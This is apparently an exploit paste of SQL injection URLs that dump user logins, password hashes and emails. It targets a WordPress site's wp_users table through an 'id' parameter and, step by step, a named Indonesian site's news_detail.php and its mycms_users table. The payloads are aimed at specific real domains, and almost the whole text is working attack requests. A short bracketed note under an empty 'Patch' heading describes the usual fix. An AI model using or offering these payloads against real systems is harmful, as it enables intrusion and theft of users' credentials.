# Exploit:
http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),
6+from+wp_users
# Demo:
http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),
6+from+wp_users--
-----------------------------------------------------------------------------------------------------------------
http://www.teledata.co.id/news_detail.php?nid=-11+order+by+4--
http://www.teledata.co.id/news_detail.php?nid=-11+union+select+1,2,3,4--
http://www.teledata.co.id/news_detail.php?nid=-11+union+select+1,version(),3,4--
http://www.teledata.co.id/news_detail.php?nid= -11+union+select+1,group_concat(table_name),3,4
+from+information_schema.tables+where+table_schema=database()--
http://www.teledata.co.id/news_detail.php?nid= -11+union+select+1,group_concat(column_name),3,4
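+from+information_schema.columns+where+table_name=0x6d79636d735f7573657273--
-------------------------------------------------------Patch--------------------------------------------------------- (Continue)..
(No patch text follows this heading on the page. The requests listed here only work if the numeric `id` / `nid` value reaches the SQL query unvalidated; the usual fix is to cast the value to an integer and bind it as a query parameter rather than concatenating it into the statement.)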
http://www.teledata.co.id/news_detail.php?nid= -11+union+select+1,concat_ws(0x3a,userid,username,password),3,4+from+mycms_users--